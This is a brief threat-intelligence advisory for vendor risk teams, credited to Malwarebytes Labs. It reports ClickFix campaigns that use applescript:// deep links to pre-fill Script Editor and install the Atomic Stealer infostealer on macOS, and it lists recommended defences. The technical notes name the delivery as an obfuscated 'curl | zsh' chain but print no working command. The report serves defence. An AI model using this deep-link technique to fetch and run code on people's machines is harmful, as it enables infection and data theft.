ClickFix Campaigns Use AppleScript Deep Links to Auto‑Run Atomic Stealer on macOS
What Happened — ClickFix attackers have abandoned the classic “copy‑paste into Terminal” trick and now use the applescript:// URL scheme to launch Script Editor with a pre‑filled script that silently pulls the Atomic Stealer infostealer. The one‑click approach dramatically lowers the barrier for self‑inflicted infection on macOS devices.
Why It Matters for TPRM —
- The technique bypasses traditional user‑awareness controls that focus on Terminal commands.
- It expands the attack surface of any third‑party macOS endpoint, potentially compromising corporate data.
- Rapid evolution of the delivery method makes detection by static rules difficult.
Who Is Affected — macOS users across all sectors; especially enterprises that provide Mac laptops to employees, SaaS vendors with macOS‑based development environments, and endpoint‑security providers.
Recommended Actions — Review vendor endpoint‑security controls for macOS, enforce strict script‑execution policies, and conduct user‑awareness training that includes AppleScript deep‑link threats.
Technical Notes — Attack vector: malicious applescript:// deep link opened from a web page; payload: Atomic Stealer (AMOS) delivered via obfuscated curl | zsh chain. No CVE involved; the threat relies on social engineering rather than a software vulnerability. Source: Malwarebytes Labs